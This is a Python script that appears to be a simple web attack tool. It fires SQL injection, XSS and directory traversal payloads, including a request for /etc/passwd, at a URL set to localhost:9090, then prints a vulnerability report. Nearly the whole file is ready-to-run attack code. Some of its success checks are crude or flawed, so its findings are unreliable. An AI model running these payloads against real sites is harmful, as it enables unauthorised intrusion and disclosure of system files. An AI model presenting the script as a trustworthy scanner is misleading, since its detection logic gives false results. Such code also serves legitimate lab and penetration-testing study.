## main.py
import requests
from bs4 import BeautifulSoup

class Exploits:
    """
    This class contains methods to perform various web application attacks such as SQL injection,
    XSS attack, and directory traversal.
    """

    def sql_injection(self, url: str) -> bool:
        """
        Attempts an SQL injection attack on the given URL.

        Args:
            url (str): The URL to attack.

        Returns:
            bool: True if the attack was successful, False otherwise.
        """
        payload = "' OR '1'='1"
        try:
            response = requests.get(f"{url}?query={payload}")
            if response.status_code == 200 and len(response.text) != len(requests.get(url).text):
                return True
            return False
        except requests.RequestException:
            return False

    def xss_attack(self, url: str) -> bool:
        """
        Attempts an XSS attack on the given URL.

        Args:
            url (str): The URL to attack.

        Returns:
            bool: True if the attack was successful, False otherwise.
        """
        payload = "<script>alert('XSS')</script>"
        try:
            response = requests.post(url, data={"data": payload})
            if payload in response.text and "alert('XSS')" not in requests.post(url, data={"data": "test"}).text:
                return True
            return False
        except requests.RequestException:
            return False

    def directory_traversal(self, url: str) -> bool:
        """
        Attempts a directory traversal attack on the given URL.

        Args:
            url (str): The URL to attack.

        Returns:
            bool: True if the attack was successful, False otherwise.
        """
        payload = "../etc/passwd"
        try:
            response = requests.get(f"{url}/{payload}")
            print(response.text)
            if "root:x" in response.text and "root:x" not in requests.get(url).text:
                return True
            return False
        except requests.RequestException:
            return False

class Reporter:
    """
    This class is responsible for logging vulnerabilities found during the attacks and generating a report.
    """

    def __init__(self):
        """
        Initializes the Reporter with an empty list to store findings.
        """
        self._findings = []

    def log_vulnerability(self, vuln_type: str, url: str, success: bool):
        """
        Logs a vulnerability into the findings list.

        Args:
            vuln_type (str): The type of the vulnerability (e.g., 'SQL Injection', 'XSS Attack', 'Directory Traversal').
            url (str): The URL where the vulnerability was tested.
            success (bool): Indicates whether the attack was successful.
        """
        self._findings.append({
            'vulnerability_type': vuln_type,
            'url': url,
            'success': success
        })

    def generate_report(self) -> str:
        """
        Generates a report based on the logged vulnerabilities.

        Returns:
            str: A formatted string report of all findings.
        """
        report_lines = ["Vulnerability Report:"]
        for finding in self._findings:
            status = "Successful" if finding['success'] else "Failed"
            report_lines.append(f"{finding['vulnerability_type']} on {finding['url']}: {status}")

        return "\n".join(report_lines)

def main():
    """
    Main function to execute the attacks and log the results.
    """
    exploits = Exploits()
    reporter = Reporter()
    target_url = "http://localhost:9090"

    # SQL Injection
    sql_success = exploits.sql_injection(target_url)
    reporter.log_vulnerability("SQL Injection", target_url, sql_success)

    # XSS Attack
    xss_success = exploits.xss_attack(target_url)
    reporter.log_vulnerability("XSS Attack", target_url, xss_success)

    # Directory Traversal
    dir_trav_success = exploits.directory_traversal(target_url)
    reporter.log_vulnerability("Directory Traversal", target_url, dir_trav_success)

    # Generate and print the report
    report = reporter.generate_report()
    print(report)

if __name__ == "__main__":
    main()
